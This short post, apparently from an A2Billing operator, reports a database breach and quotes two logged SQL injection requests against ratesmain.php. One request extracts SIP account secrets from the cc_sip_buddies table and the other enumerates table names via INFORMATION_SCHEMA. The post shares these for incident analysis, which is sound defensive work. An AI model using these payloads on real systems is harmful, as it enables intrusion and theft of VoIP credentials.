Seems the crooks got my database using:
/xxxcard/ratesmain.php?cnt=&al=A'+and+1=0+%20Union%20Select%20%201%20,2,3,%20UNHEX(HEX(CONCAT(CHAR(64),CHAR(95),CHAR(64),id_cc_card,char(59),fromuser,char(59),fromdomain,char(59),secret,char(59),CHAR(64),CHAR(95),CHAR(64))))%20+FROM+a2billing.cc_sip_buddies%20%20LIMIT%205,1--%20-
and
requests looks like: /xxxxxcard/ratesmain.php?cnt=&al=A'+and+1=0+%20Union%20Select%20%201%20,2,3,%20UNHEX(HEX(concat(0xxxxxxxx,table_name,xxxxxxxx)))%20+FROM+INFORMATION_SCHEMA.tables+where+table_schema=Concat(char(97),char(115),char(116),char(101),char(114),char(105),char(115),char(107))+LIMIT%209,1--%20- this request gets the table names/info directly from DB
|